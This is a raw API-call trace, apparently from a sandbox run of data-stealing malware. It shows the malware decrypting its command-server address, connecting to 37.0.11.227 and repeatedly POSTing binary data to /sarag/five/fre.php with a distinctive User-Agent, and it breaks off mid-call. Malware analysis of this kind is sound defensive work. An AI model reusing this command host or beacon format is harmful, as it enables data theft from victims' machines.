[0325.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0325.909] GetProcessHeap () returned 0x690000 [0325.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0325.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.911] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0325.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.912] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.917] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.917] GetProcessHeap () returned 0x690000 [0325.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0325.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.919] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0325.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.920] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0325.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.921] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0325.921] GetProcessHeap () returned 0x690000 [0325.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0325.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.922] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0325.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.924] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0325.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.927] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0325.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0325.928] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0325.928] GetProcessHeap () returned 0x690000 [0325.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0325.928] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0325.928] GetProcessHeap () returned 0x690000 [0325.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0325.929] GetProcessHeap () returned 0x690000 [0325.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0325.929] GetProcessHeap () returned 0x690000 [0325.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0325.930] GetProcessHeap () returned 0x690000 [0325.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0325.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.931] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0325.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0325.985] GetProcessHeap () returned 0x690000 [0325.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0325.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.986] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0325.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.988] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0325.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.989] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.989] GetProcessHeap () returned 0x690000 [0325.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0325.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.995] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0325.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.997] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0325.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0325.998] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0325.998] GetProcessHeap () returned 0x690000 [0325.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0325.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.000] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0326.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.001] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0326.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.002] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0326.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.003] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0326.003] GetProcessHeap () returned 0x690000 [0326.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0326.003] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0326.003] GetProcessHeap () returned 0x690000 [0326.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0326.003] socket (af=2, type=1, protocol=6) returned 0xb50 [0326.005] connect (s=0xb50, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0326.030] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0326.030] GetProcessHeap () returned 0x690000 [0326.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0326.031] GetProcessHeap () returned 0x690000 [0326.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0326.032] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.033] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0326.033] GetProcessHeap () returned 0x690000 [0326.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0326.033] GetProcessHeap () returned 0x690000 [0326.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.033] GetProcessHeap () returned 0x690000 [0326.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0326.033] GetProcessHeap () returned 0x690000 [0326.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0326.034] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.035] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0326.035] GetProcessHeap () returned 0x690000 [0326.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0326.036] GetProcessHeap () returned 0x690000 [0326.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.036] send (s=0xb50, buf=0x6ad508*, len=242, flags=0) returned 242 [0326.039] send (s=0xb50, buf=0x6aba40*, len=159, flags=0) returned 159 [0326.039] GetProcessHeap () returned 0x690000 [0326.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0326.039] recv (in: s=0xb50, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0326.120] GetProcessHeap () returned 0x690000 [0326.120] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0326.120] GetProcessHeap () returned 0x690000 [0326.120] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0326.120] GetProcessHeap () returned 0x690000 [0326.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0326.121] GetProcessHeap () returned 0x690000 [0326.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0326.121] closesocket (s=0xb50) returned 0 [0326.122] GetProcessHeap () returned 0x690000 [0326.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0326.122] GetProcessHeap () returned 0x690000 [0326.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0326.122] GetProcessHeap () returned 0x690000 [0326.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0326.123] GetProcessHeap () returned 0x690000 [0326.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0326.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x189c) returned 0xb50 [0326.125] Sleep (dwMilliseconds=0xea60) [0326.126] GetProcessHeap () returned 0x690000 [0326.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0326.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.128] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.134] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0326.140] GetProcessHeap () returned 0x690000 [0326.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0326.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.142] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0326.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.143] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0326.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.144] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.144] GetProcessHeap () returned 0x690000 [0326.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0326.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.145] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0326.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.146] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0326.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.148] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0326.148] GetProcessHeap () returned 0x690000 [0326.148] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0326.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.149] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0326.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.152] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0326.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.153] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0326.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.160] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0326.160] GetProcessHeap () returned 0x690000 [0326.160] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0326.160] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0326.161] GetProcessHeap () returned 0x690000 [0326.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0326.161] GetProcessHeap () returned 0x690000 [0326.162] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0326.162] GetProcessHeap () returned 0x690000 [0326.162] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0326.162] GetProcessHeap () returned 0x690000 [0326.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0326.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.163] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.169] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0326.177] GetProcessHeap () returned 0x690000 [0326.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0326.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.178] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0326.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.179] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0326.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.182] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.182] GetProcessHeap () returned 0x690000 [0326.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0326.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.184] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0326.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.185] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0326.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.186] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0326.186] GetProcessHeap () returned 0x690000 [0326.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0326.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.187] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0326.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.188] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0326.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.189] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0326.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.190] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0326.190] GetProcessHeap () returned 0x690000 [0326.191] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0326.191] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0326.191] GetProcessHeap () returned 0x690000 [0326.191] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0326.191] socket (af=2, type=1, protocol=6) returned 0xb54 [0326.192] connect (s=0xb54, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0326.214] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0326.214] GetProcessHeap () returned 0x690000 [0326.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0326.215] GetProcessHeap () returned 0x690000 [0326.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0326.215] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.216] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0326.216] GetProcessHeap () returned 0x690000 [0326.216] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0326.216] GetProcessHeap () returned 0x690000 [0326.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.217] GetProcessHeap () returned 0x690000 [0326.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0326.217] GetProcessHeap () returned 0x690000 [0326.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0326.218] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.219] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0326.219] GetProcessHeap () returned 0x690000 [0326.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0326.219] GetProcessHeap () returned 0x690000 [0326.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.219] send (s=0xb54, buf=0x6ad508*, len=242, flags=0) returned 242 [0326.220] send (s=0xb54, buf=0x6aba40*, len=159, flags=0) returned 159 [0326.220] GetProcessHeap () returned 0x690000 [0326.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0326.220] recv (in: s=0xb54, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0326.291] GetProcessHeap () returned 0x690000 [0326.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0326.292] GetProcessHeap () returned 0x690000 [0326.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0326.292] GetProcessHeap () returned 0x690000 [0326.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0326.293] GetProcessHeap () returned 0x690000 [0326.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0326.293] closesocket (s=0xb54) returned 0 [0326.294] GetProcessHeap () returned 0x690000 [0326.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0326.294] GetProcessHeap () returned 0x690000 [0326.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0326.294] GetProcessHeap () returned 0x690000 [0326.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0326.294] GetProcessHeap () returned 0x690000 [0326.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0326.295] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18a0) returned 0xb54 [0326.296] Sleep (dwMilliseconds=0xea60) [0326.298] GetProcessHeap () returned 0x690000 [0326.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0326.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.299] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.304] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0326.311] GetProcessHeap () returned 0x690000 [0326.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0326.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.313] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0326.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.314] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0326.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.417] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.417] GetProcessHeap () returned 0x690000 [0326.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0326.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.418] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, 